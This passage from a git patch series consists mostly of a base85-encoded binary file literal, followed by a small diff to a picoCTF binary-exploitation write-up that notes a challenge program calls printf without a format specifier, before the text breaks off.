zQJRCB_#M|%k*tcM-VYLkx7lJ7i^=}!jUsX-F`bPl0TqMwwB%Wl6jJ7EqwmV}uep(} zG6v2DQy3mX-s=C#*@jJs&AiEz(THA<++o&MsOKZE3$|OQ97FnQ8Isqa%|$m~{AF&- zt-}3M>Z)Y32KU*$<`}+ZOHs}E=jKOcF_Ye_b^T2ru4l}+GK{w5-Te!?)+)oLF-EN* zO}#nB=Pg|JVrXS4<_lVlx6Dnijml6i4li$-8xP-qPTx$2$IuJh>lKjc6(@+o_Fu*R z{D2|g$zyC%xF(X+b8&o0Nq_2BC@2`T+K$rC9R~$&T_%&RQiT&L!y^!E;H=7{R@ zE_RaFzc*daKiw(9+ljcA$F>ZQ)Fp~isa27jvB*9>Upk$1`fWbtaP}Fpw{mVbb3kFS z8o(s9%lz=_g%Q(to?MwZeV$(=VP z&_wPdvz{4o;=|#?b&?UQTsaEjk;fh+P5SoFvkQgO4ZkSuYU+5gwW@BFCwNs<&-U|_ z%Neb85>T+vw?e;5oHsD7?LPKkc=vm;kxJnkq#ekk|E4qmJNJd$H`4hTl4eRpyG!bmo(n zT--V4#9JrI%^L1`8acqYrpn;BvJzSx*JJ)jRHvmJTZ7BOac#_96D#Qn^tYh~q3BIZ zz{Lblw`tA6V1S4&{ig!WX6>tY-ys=wF_B{CA~ozwJdX_0%Okh66p-nk|BoMh9E{iS z!-lsHu7o`#J(=<_AV9|&1Ey)cVDDbrR@cnw21h12kXuHVq@ecQelUBB%X3T9)AGLI z_pAmY;m(pA>aziDH@&9sm&FDvt4&$t5_IVV?782b;&C;E78VPCN%xw3Mt9~BCW-%j zvG3v6|@-UojIE4Ncm*EO$?ch*rJteL{d1cZNy$e z;xXD1Kfa}zyZJ&$`jjbch_~XpWHq%V17kj1d5F!Rp4B$E$SKT+BF}Ve`B9rHS-|4G z{cdz$d`X&cX`Zl`t#;m#g#N#JBK?=<-(7T)UBi%)KemBgZL(osE*^`G-I@n1HlE)g&287?x6ftunNdHo%Hz|3 zNYvkuS;qhLlDIqn^;MiKv7LdDu=3-=c^XFcx{mY+A}l#S>|}OHk$C)yXXfYT+V!_J z@7y2TnOiD9-VTw*@+7_)lVoVM13j^Wt3zl%X#5EiF90?3Lt*z48GULjK;?@CMvj-m znXec?`zyLC)|#(ac4i3LKOn@H<=C`6oPY66d_4lwe<3KpI&R9*T#lhg9#fT zI}v>|t}-h0A2&9&{YzZpW9^q?F9(uGUcmz?k5E@liM}Z<1uA2j(<3&zGw0l zrxrPeA$;YlA=bR1+n7!}SCMwNP>kzlR5VUsX1u1=1!Ea)r0F61xRrQbAz|Wlpz>SH zutkdy*6+W{1BKHLDm-SMX7KhVo5Z6g+u89R95D;0IvTrbq{$eGoiH(y8%a>aE5S&AR-Eqxr|wj2Dm<{TlhdTkBgvJyG@ zUahA8Fp0eyknm%FWHC492`NDAw=NkFXR{mVyVo2a;em0TBKwt(PH< z!(`AJJvvF6unxdShVc8Y)-$J7&6^uQ=t2yUTp}_^DBPCco?%uVTP4roJa#(9i2`)hKH8t%z)P^A}M!lKGYuwvq&A!x$qNn@Jb0QTqYy>Lz(|DF1 zqC1SAh#tD#l%PYTCtJvypW4wgiW8q=wc!Y^;dD4Ch`M>m9;>~0sV|2vuA7QeJG2dH zP+`x|Ix*$SaS`u!dbTrrupqU?J$Ni+tEugAuI>$o2?#etsg^p8*&su8?Al>(FSawb zPorOiYm#1gXQ9XlrB4GOu@P7m>F>w5)0<_)gYV2hPr2+78sSws;NHbHyR`q2MA zwP8nRs=+DpaG({11*OuS$4eJ4AjMR2PaGCNO%T%-CQ1&?h6UC@i1nX)~wx` z8`{Q}(pO8E(=#KHee$nE&EZN*6PNs7UcENo?$*R2q`^W{Y^9>XO1o23MH_v(FFY|bxabrf^I~{=voko0s5&xn{~@`bjYdN zVk>XPc7N6m34`H<|AA%9QpAt@>L|@|^@DxyQ`|Orrv2lzj|OJkvOXLj2fhg+*<(%a zGfh0Ix?#+B{^r*6!rkClg}qeat5{@!8q)HZ*T6w7YT&@FepJ(no z{EvgY?Re~PG0illegB#GrCFM*DX>+c(>6r}{aD~*CptvefB1RP0!7!0tvuzirSQWW zW6rfC(h0S#E2p{UnS%bF{K~h7Om5$%TF+O=AlwV*9=JwjwG)lT5iZk3^G=HP`fn5s zBow>9)~S-%z3iviaW0J{Or~KD9B-pNn@Web5T6I2&*Mkxo;WOHC#3O!} zcw&jDV*FEWHLlCVv&$L(uc$`sGIf#%w(-V$BbK+vVuA}P>`Ke9n=_@y#ry?_ywl|2 z6T}@?l(Oj6IHwF95JNO0vSp9&lWbdqVCffq@}3m86z^PqcO$ZRzn%F^K!lsdF(Hzy zK}3DY5W3wC7x&5K_Y7eVhNdLxxVFJUR0)SgRB-QEjO?c=jzv2C0oGe8$WaZ*pQnuahAS3shn-H@Awt^F6;2Hvi_!L&)i@o2(Xh3SX*$NjgQnJU+wTVuKTUG%4J~z# zA)4lii1v8r#(i}1>9o+0>U4suBfo9DhQ~`d9x_2s^%^${bdLg`7yHLcn*_$^U;OslyesaMw@jfE0KbcbP8kfB^=6?z zWhur0&zlkYN^8iqrj>a-qZ9o^a{gsp{7C4+sWnulhszX&=D#{+5AzeOP0>rd0>3etQ7gpr5H z*6Gj0Ct(7vBkOZZh@j+^FiLo2odka?Bo1&*M|e@E?n{BXmUFyuL(xhLhZ^IQ;k(HICf6GJF3@ zU!HGdUr4z=`}sA|6)uw>Y>kR|a}38)S;|vMr{I(cJisMzmVsmuU65n&BSf##Dh^}= ztH8i)PJW}C+i4A&VhG$6W*_%1IA7epg0 z@7ckqoi{hcwkt3@ues=|xjDY35qC~sV(uO`V4H{DDW>W%pB zszo=YM#;HSlMr$N$BrZtPNTNK&w?&iy)lfD_f~Ko=}}^X2_KKD=#gvY!Ej=c!JY)m zxdF!gssue(sd9#q^r*RDAI4Vb$@pce2ZSk}FRR-KeSuFS$S-gJQeMyzxnqnHZQnV_ zJM8x4zqQ|J=I(DzB24F+J`&U+%yZQ1Qn1B`Mv8RX4Ao9FBux6J z#Go68h!^P47s|N5D8N}#GQ4rkAnxpY$_9HX+GW#G^?Yc_jVo76%whS&rsJGojUAFNd*b0u3{z4|Rjf<}dNc zouM~GH&=&BxoWwe)mLg~wl2*bw}&xa5sKwroh`FKrSnZufX;{=YusmNoHc*UiKJk; z!@;9SDsa&vi~+s<9=qV=*dw>h8){7hp4Bmb_a$4fwtupCt+AGNkaVE7&l@Oc1JB*b z;*=C@m<@g?-Vb@zY;^14u^VD5c*W3g3O}g#l~}7(om{Ilk!&MT`wG?2803Hn?3NK+ zl{8gZd5vBDra@pwuU5$Sb*<1fNaUbhApd!Sj;jRT z*j3MRWy+*tsFyANcw|z2TD!-(XWOxGIcl@rs8dllX}ks1-U^cJ8@$4==2(#V!x^){ zuTnYMCW=t`5kO3Dw=>%RqFTrFteJsZL(+!erXm0niW$IYyFOYpn@ux7r0s9mOjTv2 z^umzFSwe?#=06sY#%xHKkmLzoS#*dK@AcD#t6F6r3`*S(OfK{Wzb6s3rD|X-5Vo)} zDt`ZE0vAo$t-u+83;zq0@9bduk^17flwwaQ#MW(VaZ@U zNq{K&FN6}%WdaFmogC0mW&xSyLC1Y1bYX1Yi!DZdyd_(3%4W9t{uHtReATGP8Kq#J zY85Hqj`D)KqR@OGaT>VS9)awmhO_0cI!wwC&^Z~QbOp$PII){E35^1+v}!~?u+LYo z+pgW6VP{DN{lP;?$az6-|NY^))@e?EDy{Egz6RCwvav7ii{N|p0O3w99=#a0o4N)?0D{s_je>%a!R9w@4ir{dbcWnUa0^ruBbIJ}LVQUm{f_y)PK2N||bVdKq=1%0>IiZALtb=xd|7`iOUp3fnAj&@1z!n^gcBV4W6fDOHnra0O}aGB zVsFI@5BWKt-;KK^IJq+ApW-Geg>BxZ<%#w1ZF%SHFTI$X`>3MA`f2!&_PTm@#C; zm%3{i-lq^z+53b;3l8Cn@j^bvM9HJt9WRSeM%Z}D>O+JfH+2oq95b43?Hi+Yxr#Ai ziO+XoVh-x&d9yL-E0|up=d*$=d6$cqLif~2M+Z+2BLqAU&9k3n6p1I*)%~w#CuzLi zD5%hob+b8oz;5!AA3he&_Gog)+FbYk37gfGf+F0zH;;ej=UN}in~NJX=e%*9mz^0A%&e69 zvS_hKg8mzQLzeD8RSncg67T&}XqKkY^x#5nYjq7A>wK*f*CKgwQQN5Hy|zT2k(7{R z66SO{Zu6f}VC=hXIrv?Gj!D%s*t%k)Shu6EK3l?(R*mteE?mgx zq5=%JCBj_ru?bY30l{h=`;GVMoZB$aEa@k6nSBJd_l`MpSRii*)gabJ$T4l~ThI>L zU0MZgfoLG1-MJMZ+apml5N1p2=9$RKL$#7S%_|mg8F9hCdbiNTipak*3-uZJRv*E0 zZ?4fxGm4QDFhTaUt{0Yt z^bwcQ!vU@PUU8%Tbi#LOihgbyN>hKK4t&%%V#uCxxN)A?UBtIxHj&_iF52ltAH!JA z=!T7DiPCIN#Fba#F!j@DuMi{B%8RM)5e)Xd&RxQzwQz)CbufVX4)+FbD^^>4%tND& zljI|YGn!kn2G(m%AwFYj6tVm1`$oe5tFW(tiZbfDR-}Rw?wpc`<{SdM@^tj52%r*-dvX%DNV2dg5DL^`w~F`jt@Ms=l)9?}avy zv3<%^bWCTxRwL3gv)z=@9H0RgdUd`t+jicW?BatFW7+R~iAjZ@oaqPaO9o}HQNAtR zp@M#R?C9ILa|O9I6a#Dd1GIY=OXxMgl?FGiKZPOZEY1@T@U+yD_0?^a(jEQ0K(rLl zwRr=8Za8%cpanMHD0q;CN)5$h1j~v3&eQi-=>+fA0x^nqrF{_mVd%ZE);>V692lH< zFMoxRLeJ;$l+qYh4osVj$3lG;KHM)0cx1>S=t zD^j3i)Ue30tioQyHi#CnExj|Pz)8sImzEJly_=tS^mb*``j`T(2~~V{9e^O)8<;Lr zJV<`pP(&~pI_3dYvXfQT>%}-p3ro$dUv_fUAz6GqaPx4VERZ33KSJ0lrjH`K?HI4e zaTnCLHIhi6Q2wD)md|ty{9-9QOqo1T=nl*k#XE+O0qTLov87Cr5DW2}b`w5iRrg7{ zhWw7hRc?I7k&_nD%4p42{9-i+S!I3W`s7v)Koj_wq_5o7dGCI?8Jlc$IGniI>7Wq2h@OR`js z*}^sJnrzS-`RuqtLQ4p%0KOyBjRP^XBi?7j{kvdNLBotjlHa{8HsSy#D+ND5*fq#v zZc9{n(w8ETrJAabyv%kF)h_LAqzt)E+?-`kQvcJc%dZb?>CGF*_l?WiPWgUm`#Z%z zDhij}TX+(Phy`4Bb{Q?XfBdMmVKmsf_M^qDm&nxr=3gUw3w-JQ<`zcwKZv zKod74AeKW3abV)JtV}(ypGw$HB+rC}W=nD#2#Y@;nIq6PT`t(8&Kz0(v9F41Z*U|* zn`B|q*F!^k!gcXj-OmPO>OGcfpsuV`f_*gTRZ=bi+Ol~A#3%Uyi~9Va0(J|YRg!Xg zo4XNFk!0vEl!KS)+BUC~)_o#;OwtQ2FIezXLbPe4E@f|`1(b)Ne^h*n)_-p!LO|MW}9Qk&dyuVDTrrbmX> z7)I(OGXH^$^MyB8jv|F$`P6^|Vi_jxgK_68@sDnuU&8))HNg&@80zOY%ZwE5EpNx< zSRoR6M=(+;oVVN36iPxCP2m`vU!9tT9f=aJdpS#q-a0lnKRrmU#&|UU;yYtMUVLwE zUHb$nji1myu8Na7N+(O|YY~oC`l&6YUrLU4{$BGWVguij&padEliG^^%*bNi)$ab` zcTkRcLpqx!U5md|RVtBm6y2A1RG975(uMoFpJiDdt5En69u$GjvkI}F3emxMq zUc41^I>(NLFF`W}a9c_ZCG;pu^rX z0OLoC@mBbDx;ASS&|(^3gK{;7j0$J0c=;}mMsGZ=5;?F0Fz>4{C*sgcbGce1fi7_3 z=ugS`0)(9(7%kbGiOs9YFm3C@%QEJW6u0@7VjOS$F+m8ILie|lFtJoV{B^LMxjz=9&{u+^JQf9kAD$D$zbz3R&-a}#HAZNK9b^Tnbz^| ziD!;&D9jW)@`-Mjcc`Njvv5AjNx!uGoTI5yrw~C%fOWiLtWM{KB>-KfX(pGblEi(GtfV_X^UW}!C zFHlh7|2X(HQRxldDKQomgT4ySNvy{m9Jw!}n1ppB@K~73wIqo7a2fzu}|5 zos~wu)+B?@^jqhCRACh^joBZq1R4xMi%+1hWmgIM#@%4p;AfP$;}};h9iF>8km7tW ziFc_=`1}U$b${fBI_JXYEQY)}eE`B0DQdM|V2%&+0gXUpT(|m(4mZFW`BgzoBp`F7 zVCA%|ALUGrSMZP|fZn0WULZ3kZi^7`q`)2WY4F>T+5Hvm7WUb{K;1l!wMCbWMtbxy zt1pWm1EiH~ID}b&q>Yl4Nu{NahE0>1{TNIo8O@*3N_ULoGY@0mXZd=`8b$y$BJ$uV zo8N;&+vreAw{a7$u*LY+GvR}yo*Lh+J|yjR>PonSQ(LSgqqBct+99|}l=rDtcuM#K z%8W%HY!L$ne~2^v)24GA(t z$3?za(3dH>F5`Lae*a2$OqctPP$SCzYMId0v+fB(?e01rpJJgIr>R2<7k#nNXGM!? zjpBKt<+EM}xP|tN&WGu?H=(8zvv&OdB`CW54vIk_D9Y6^#xonb9+~!IC=?#QYxXcp zVcE}DqqFcO??@td`6zK1H;@FD(hLBCrD70ZOe$a;@G~7R9;5(bxfz1*82HMl14eJ| z-X5cj-hE`I}zCaok;&|pK|M-#_)Qb z^)YD#9C}iqHwRL$5%-$a8VsJ zHxzgg*E8LW`0Nwmz?*Ti=&+mnZNJD^frH%B-H*=<>OVi$%6Y#vx98iaFikYTurWxJ zDNo0KdtTbkl$}PbI9^@yVZYp`~`L*@^L}4@t>9LAlK&?EH&NsYPwd(=RfDAlqq9_&PEZl%xv8GlBiG z(y12LR-$ADv+W6d6~f2&yD~DBO*%=7?xP@(xJn3_!FcULC%G9_9%W$}>}$pzs| zXIDHAQEF0q1BkvPO>Kdi%LXVwLS~`yOs`O&K(D&JyU9*N`hAJiNmQ#cuV?j+ zp;`#@F>An2nVXIUY6%M0#h&?=s#L=fb(2pE!y*O`(tU0w`N5DkpkeJ)I^OvBt_c2x z5zDm3NrH#%Ga+K54{&EOX}tPAWlufXXS&bE}MXd zugd4MY4_npqnB|+OosExS~RBgWz0=mG4|!7J6c|Kt)M+~TG&B?vpIHD*D&Bd#!#f# zT@ke~AWyw55g64KikUk$7K!arC50HU-QZPHyiO2*=?}jrL0fm~wo)4iDFHvbeK1<-Z z|F#<_9rjyBnZx#+Ph8Br;uaEkPMq!yI%3{65MZ~01=9w|97K^05w(+(yCzFFOOT+UsQ7sYACyT#@ta65$gYb7}Cdx5$-^p=2jrnE6i5?HoD zh@d}#sk~j0LFrqPTnCaD1#lorm01U-gd2LOnJW9Z$4s2`!Zwka6Ry3WQ+cSS#2BU$ z#(+U&1#R+A>yiI3eJTd|rCRxHLV-H*R*mLQX}xfztJgo0hAaRb?&qftoxo5#nMQPR z&i8iAeRiFZl2W?;#*{~ zLW^h!iBS3_>F^n1lX97Lm14oRsiro3)x)U^ULFZGeR6zLLbJhu>K}s!-NngQACVrB zB^ScnHs8OwNND-9{_5a}%L?}~+EC<~ZGJ%7%J|!S8L6-Db@jh3iUY-tFEFSTeS~j- zFMch9b(urK2RH>Z`c?3%?DS4g{uNx}c3ZRqK{@VOB5v6#j*!JwwVz3(Rb02hA;_ z5nOo^OF1BV-WtH6%X|ItEm)s|@#wdzvsx@FFGYs)g6nQM7i@;z|QufB3X4DP+WhOMd9Ou-|t z_FfFoY(VMAjzmM8uNWK|FphOKD zTsV+CXbd>1yl7=K$NOs%nWCPAzPcu&0;~ey&mzl0pG2aP!81q#y}yet;0+)hk@Y+} zVdx&j#fKiB1K&*mPw~jmu3mi=SpPKs*8EOmk6w}*)X$+t(teOZ15le9@6~mhrtq63 z{*&PNx!b8H-t-1AH*h9+9IQVK zj$n>4hsJI4eWm;($>`tj0{_LOrn4VkU$O(mYBIpN)qw$Z$QtJ7Z5T~RNh{f}r zj?}d{Mkx+pE-*&Q2{|#Vdm5Z$5mVnFP5#&02u877st^EFT;t6~;5!QJt(8X#w3(R{ zRnLUDj&Y7Dbiqg9L@JEB0S+AMc^fSO@IZQFRAEIRjk~r*8_rLWqVT6s_HTYS*%~&> zen&K|_V#=;FUWh`TQv%N7D6@TVaUtT&o{vx;2&~HtN|^mE#O3*%2VH@?N(0s>)MIG zOT}`jEA1j_e`c-oSVG5&;NmS`yZF9XO0YHZc}idMgi&xgf1Rh{rWAiT=l{J9!4FFO z!Cg%LniL$GTt&M1R&?5U`&4L#_eyruIIZ1z{q<@r0R*P?>hfX%FB?=esE`$rbjj9# zTithKZr+6nd`U?L??vEJ0cUUo%Uu|f6^`S{h12>N{^{kPLCb$EV+OFTJ)cvgJ)}aj zy%s~T1*0x57U27KnCti&#q8fc_jwT5Qzu>AZGJkaXu)cRRBX14OE|5O@|rLKt2z(; z|Gp4{Q#GE0FI&!s(|XC`IhQa7MDN`0dv#Y8S%6!&-2@^zBuo1?={UHJY}C%{@i)Vz;%Pp65Z2SnJI?D=1z3<`nu*hXILTJL(jM2ZmT_t~T0%8RaaQ}XlKlb$| zwBol^Yt_;iwAK4Tm*4IK91+ZZj|#l%ZQ;p~1(|xz(A5@pakqsxVk=S_vA655)Cvy# zF(d!iiqv`Y`x~aJnxR1Z{TvLVk~rmg26!A`Gn2u2DbV{s6q*c_yg;ApzYNlk22Vgn z$^$M|Fs9>$G|Y&#mH(XmU5s|V(syAdOep1rER^T$2$^z`Xo2j0-~D2X%+_-UK<-{e zgtUe%wBfY&b`qbfb;hLS*>2PUeqv9{y6z`n1Ms`)oa;^j~5$nnl{(0$%CtC$&}Q@Jp- z$p@6z(*`CPKmChnU^#INV!g-u7`N|cMb{0z51QGT2-IS`F0d+?YVxh>s=y(niU*Vc z-!WfW^Q`HI-b^zb+!XnV?uE;QK|Zs1|K>N~UN z&*xfPc++-z^&5?m%y$A5bPLoe^JIm20D-SGLcGUh)PJqWq8!umX7E7M=2ocZ|G(e= z=g)VmS;<^O7Pgn{ZP8IKJw!`+UEf*_imUbe(x-9Sk?x7sJQEFJllz9ZvuOSXz0grN3{yh=nYKeO0P!0u~$IliRG-3?@GQ_10z$^ z=d5DRZ;2eEIgr+0ZubDb8^}bTKs+D9yt=+0C?est7M7=;sMX>mC&5;LnEYeM_Md-A zwuK)S4Hw^x3$pq39TUrmEQcGi`lzU9-Exl?qUelfzpsHH(q-1;Ve$f<4k18yDHO18 zg<`OC43wtY38Ct*Ig&JbLO+6&P#8$ETT@Qf+>kvB{weo1jVf$)Q|fmi8OQRmUKC)8 zfgC^Tc^EaHvHm?^O|)F6S|1XUwXyEDQ1kE}tw0XZLJSjc=}Zg!$Yr?Zp=X+`OH`iv zYlA~Z$q(VOt)#JEVgX|&q}0>q_{ZQuNtW1&@ov5VRWL7n=&$$Jd~ttAr(^k*Tip&f zpGb2IQup3W)8inId@cyUv#_mO@vxO)kAC-DYk0+(aa!SSpYIYvThY7G;Mi0KB@TzS^iCN1 zaK^1N;KV~-t6JE$=jW^+EW8;Fq9TsO>PVrqMK>qNyCfbpJS)0o^yzNA1#$frOAPCB zzKhfMk_3R1O+EBGuSaB#vI>XZE{p<|Z4com~*z@0V4^XiU-Gy23QiT)uRSi zDgg_kQUMdIl_|~Iq46f(zStn8=_KTZMTaOD9Pz9FYKQSoy|1pb)%8orov2e60psciHLg>)q{iKZHIhqo3!hpRotXxzmu%x$ z)C8T&KC1sAu%$d%?W-Z*J^i`Zu*lQ2aJ#B`-6sPCJ6AU4Xc=y;5av$IT&*KVpL>hc31t!kBV6bF* zjz3W_Z{X?vc4hNumA&@KdT}{;-)ti-f&Od29Ad8INbVSZ#TW6;M|!>DaIVqEf9!;3 zw$W!W_gmkZ&f0_LbhV%h96>Y8iccOzCRWp~uby=0m9-rEG0dM#K}`)8hQ(Iwf-f#< zKfnN-Vn3Rd9x?lG3UQk?R8#RROI`hOF}ee%8Xzq^!(1=#UfLI1CJU=&#g>gM)xzDO zTU2u?*2#Urf_z`W9E8@1_a8{HBqp=7>WEs|4ml_>Z=Nx9#7@0*nqT|Ds6#2mE{~j< z7Oi3FOrg?ewh!u2)IFU3M_~aLJ{!X(7YFCr9sC%+bW!h=&>4xR$6wGOtAB`>jO9E;&!vXhczUFUbzf zUuz5q>zfr+HVmBe%h=@@v=f)w24|UBpC=6?iXNtV<-Z7U|54OLs$=H>j@`|Ny7lfG zv3BVXw-D-Cx|u=3DPQC0IXQMnJos0YZ#Q+a&BVa%S6znQ2h*s--{G*5;=;B8gO_RE z_CqV6172156v9cT)JoA)OpqBGgx-lboDIQCaiQeUj3=fS`^gjO&Y}HIE+p$3-riWT zp|;@R1^xH4dGXeXSiteqT6i6RlF}qRKWr1h1c5W&_R>X_bp`k8)0B!(uWP{s^B!aj zmT(&)d-&vMC&Rf_3}S_Ox_fw!->uWaAI%+Cbe_?N4+W0EW1B;GnNMCYVz&T8xCYX2 zNU}hdy{m?aQhU8TBox6=cU_2*?YcDEJMiBLC~gdOWs^1`SbkYDl;F(A+zB$d9ZJhA zz2|I6tH4-y!Lig%x~V~P0dn~pFW^T| zgliy)HwD<0_CGtAoOV)Ggb+aO60NjpQV{fFiP5zDJ%w(n-L^Nsw$TWjncPd^c4}}S z{ql(rn%i=XpHn+y%o;Z8I^aAJNE|%aQm(-(#55n=>AgM4Kl(vaO!>rb@%_r<&^vLLSr+P^H-gH(Yb&ljoQQqoozsq-ZLbtp>A1XaB2 zEc&RV37eH7Sy%JvV5#|MUEiy&Da0n;Pvl3>Aa7`0(|IifPBq1wb@R)|xb`#j#N#9h zp-gv-{$2Y1?;j$wFP0ACtN8Gedw$TC@UD#kVkkhXOR2V@knOnn9~jqNaanv}R9>h& zehBURT0m(YV^@08{(|_vj{n>2i>DAUw0WU(aBYjY+VFkgqKuo zmuLun9c0Ifv4%243yk|2&LeK)P?8AaIH&=@rc(vw0VpZFsnUmOzB51%r-ig2gwT~N zKV#@SnZdwP@2y$ZLFtDE(T@1OCwtY`QgvtAA;)P#pWcajzNmJdRx@Oj^fuPzx;$>d z`=}(IX3B4WotHUionj;-wxd}u*YW1bS^0{jGh(FGz&DJ0t|Bn~jbG&_*=o-eL!0gt z3%qNcH0Yt@PLnIk2jUAfkz0a&LMHEeN2z($KXB@-?|$o;!_kEgh#)SB?xnn;^5)t0z-m%Dv9C?0i$!PNG&74TpJAg zX+y6>UqYSfU(=N}$4Lg>Z#mD}O%@+!kK>a{fG4q(WCB(*DXAqfR=Nuq%r=?{EmTy~ z3R~R=OO|MWlB{bg=Mk7^bnu|t7hm9BYSB!cdv1wEtGPcXTUM^zi>6=z4i1|&D+W(@ zsVc+V4x4av>!UOR#GJNfiX#G~Ms7ZzvJ}pJ4L_Qw%-5|lwhg?u5O^MX+ihw(Bh!E8 zpSddycHBG3a?gW$`tevm>$Qi^o&-(yGo7_~9GhLBcCk?Nqf(v1%qHFZxGr}s973p; zzR@31<9`&kWTW`l`l!%CpY3&Gkew&s8IA@0Iy2@&XJ2GKm=_^@)Nxs`KW$XwblZm6uyL?^8Nvnlu`Yr_JJ43}{WaELu$c6Ygi+8E$-( za)tXismEMv9=c80<(0i_i6h4jm9KUI-1K-~XYx`|za(CmBnHO7BgoQVzP3N^vLCZP zE7-vn{lT=0<9(r&Aa(Z!`JW_h)|$OG8knntq|6@s1dsU2GK)0e4R5bHl|H$R*xVX^ z5{ImgV|a-#;dBdBhq2~i+5L+VJN%~2`OWP8lau_Za@yCw7v~lyW13Z>Qn-qaE*|$> zEqlIUT$$e-3a;^5@|Bck$%%~XEGiBy>sGd1Ws5LpEYqXiKCi%Ob!Z(Rp->px-q1ib zLO0&tre7n}Idu*;9?4zbIJAsCtE)w|3PCbYJzeex{kci~&%B#Ok_^8PPRqa&2`yFa zr*>ZIc*!@~Sl=WWBE=zDql^PXCK;NOFE{MfXv<;rPmhr0#jI@*|5w*wq-?KWv;36F z)RU+VVU|8)Ve>TsG#wmsXM6z(Fjy98XGRhRpRj>=)%zko*r;VbQmJ_dujALhUeUWv z_BK8f;1T0kS9cG`i;ypB-*aHLQQ*%o?kw+4A0`hYc>T?YY+W0s_y^LE7yI zf6fr9rc~ryW8FWPO8>yWuCMcj$mR5V+>Nt<`qY(mv5JM z`{cGH#9R~kRu+gC8sms)Nx$vYAZ<8!a4Q;ATN~wv35z@nS*;IRj1GDfsft!czibVYvStJi1H)d4sR?2u4b42`_22J!r8$ z_0wG6&A9QBS)kJ_9oRcGA5J@Axew03=kNsNCPC?dZI$Q(=#&pXz5(&M({{rm(I{;w%YS#_$p{l*f1j=WR02%~rM6=1GnADKJ5!p} zrc)XP`1V@hSsXdK(&if*Sg2L$A)8VJP_6j@0K9&0%LMg!uG?x~nk%Ugj?Xq?kt`cS}H9S6@ZK1)53E52h910m2k}@m0hoK&omn z?~jx*12QMRmz12bbGN`#G^r^mF|8lT?O#yPq(#fV-AgW+s#RD@JsxpZN7wDipanyi zamB3|!>Rxpga-@S|EaTe`Q-~xIjUU%()&WzEI!ubA2WS_Hc82W@(lRjNkE2H2oP^B zJmCX(K?`o38*J1RBi{xlxj-0wQi=IVt+dG+x0xK`C|tK_x61E)zeq2UPfxO0&h}KZ z$P6J7XMJvpj*vDiZYVSP?3zo(vq?cLBU#i|k|vU8JF3!fI#e;5$Yy&F$uHY`GnzW_ zom7oRoO$5NlD6F56mlsT+1th3Qa&?i+O$fCHI9HC(L2MC%k{m+@B^fKr7&;nPkc&#qw7M9x{s2ebpAlWtsgh z=!~>ti`j1e_G#+}_8Uk_90pQ#K`OY+OOlfl-ACt5awOlwrJ89 z4AA*SLw5|n1t1OwhU2}u1sjZf-F*%!cPaTgZEFB=Bmgs8{F+a|wSb+0Lo37Rt*DdT z3w(E{Cd&J&7M2g%fwC6kSoh3t%~qs({(G^RB8`AC7wVEUD5Ac`F)z&hQd+n1coZ(U z^*y)t>ggttkBs;FSRs!_%B}BS!8GVYR-d7+}}D*aArm+@8`==Fy}uH?!{ z16c^0xc#)WaNP-)zj4-CxArtZ3w_Rj`F$R6+TRxT`A>iAe;FC5v2c*#1Fw#~Y&{Rv z6^c+72@m5BB~wL5^l!TPI;!fVi++5Ky%{c&KYVaJirTQq*NolQt$IrG?JZBy4ejH) zj7ASLgH0K>+!R;crMc0-v+uWVChgg}Gt<8I&WVB>0u1v)lv_L zy1pn$UNbtAlMaG?*fn9Bp@LurFET7JJ7t?o3zFqzgd-O-x=|2YdA{G8$m4$f+KlDL zqoD@$#VY|W$>cQRuBKbTk+YC)WbLyxUHMc^x+YO_mC!EANa+f$8U)1TkI;)+8G=B4m@Q0N!IE`;IesN zC&2e8ThR!+ReT_xHBOL*jw=tK#ANYTHed_e~-(9TM}?O-}zgi=tP)C}4hn7dFWyzp2% zRpyS*jtm$%E@p`UWYli!2*Er-3(Gsrc&FgVyin82f7OT#F!BUIelw|i$}4yZpNZH7 z9cb=AOR76K;!|OrI9W2K-FG6(3NTEsf#k;yF!S}A8~|wGPf2ue7wh_Bza70oLR;fd8}X@Sd2Cbh2b?#73U=T?CDSLHn_4yqfhIBmB*@jQEE=A6yGID6i+ zw91iYdpF;cd@a{(QfpbgqA0ZBj=g%4aeE)V7Q%k$hikL)V`6u0b`Am8rGzq+14R(NWE3EgV(iZ7U{KSa(jwr1iE6~r0R!g9@%q3ahwfcm+xajBPSC^u4(uBYA zwKY!SE8e$tfoI#T+$U*Eg; zIgqL^(%CzV5MqbyWz5k+3b0zm|0)>iKqd)SM`%O7b{jiA%d(%^R^IJEUO8|G z81>G{)6N`TdXs@I7e|tPD?`TLfJIjUu8}TQ+VUZrfvv4k@qPPsFd4p}nZ#Z0H^^TO zM*wQ%Ls!t>0M%D6RJ9`na^QQUdeUU|+!~(rs02c=weoXJ;NzG)gB%o{x;fRX5uFUe z?HkRsDr{b^2)nJ9KV-T$B9~P7FuJR*Z&`PiIO2ESeL6rc;F%JI)rhuTSg6^Kah-dd zhubx8YW%HHAIw4a6eciq2}>qOp8}25&-P((A@B#$y;)fnuV@~DLi+~)3|GLuVhXJy z-LdDw!E2@plV>b{-s~jqJjsG06!V6Ex%};|sGa|- zbkCLK|K9h853^mg%qP+>TIP4D(lSFVsOrhS3v(Sm5@hq8pg}X)tqZiGb%B$7egqgA z&^U1ARB&m>=x@bDJ5%Qn`VAkpiy;1LDDyyK-~P zsJ0wm5#uhG%5IUn+v#kI9yaY!kei~@c z$6r%^LP`iFk4g!BeK(9^vc)-X##110k;B8eS6?P;$8;}qmIgC<9z1D(=b9`P`YQQf ztMo5&;Ax_ls4Sbgj+N<*Ni?y@wctJd{!Ez;sY5A~_B7T?e0p|4!1oL%3ya#~u*BxC z6b&^NBXGTt4$7TZU@>G0+5c~l@_+tKaH{5Sf(8EtIpUI*_TL`nKVY-r3+l!t3(&L! zM2d{e|Gstpl@sPj{C)?||Md?3XPf(fQEHStf3LC2zquAq{r|8YB!tG_oC)^AD> leE%=--ar3|te*hQJX}y27|lhSe+m3jSJqN0Q+OQm{{S7U)@%R( literal 0 HcmV?d00001 From 76cdca9a3dfb2985d4cd5f9d533d12367030ef57 Mon Sep 17 00:00:00 2001 From: Madalina Stoicov <156598074+mmstoic@users.noreply.github.com> Date: Sun, 11 May 2025 21:35:15 -0400 Subject: [PATCH 9/9] Update writeup.md --- picoctf/binary_exploit/pie_time2/writeup.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/picoctf/binary_exploit/pie_time2/writeup.md b/picoctf/binary_exploit/pie_time2/writeup.md index a1e62d4..a7d0852 100644 --- a/picoctf/binary_exploit/pie_time2/writeup.md +++ b/picoctf/binary_exploit/pie_time2/writeup.md @@ -108,7 +108,7 @@ int main() { In particular, we notice that `printf` looks a little strange: it has no format specifier. My installed Clangd helped me get some information 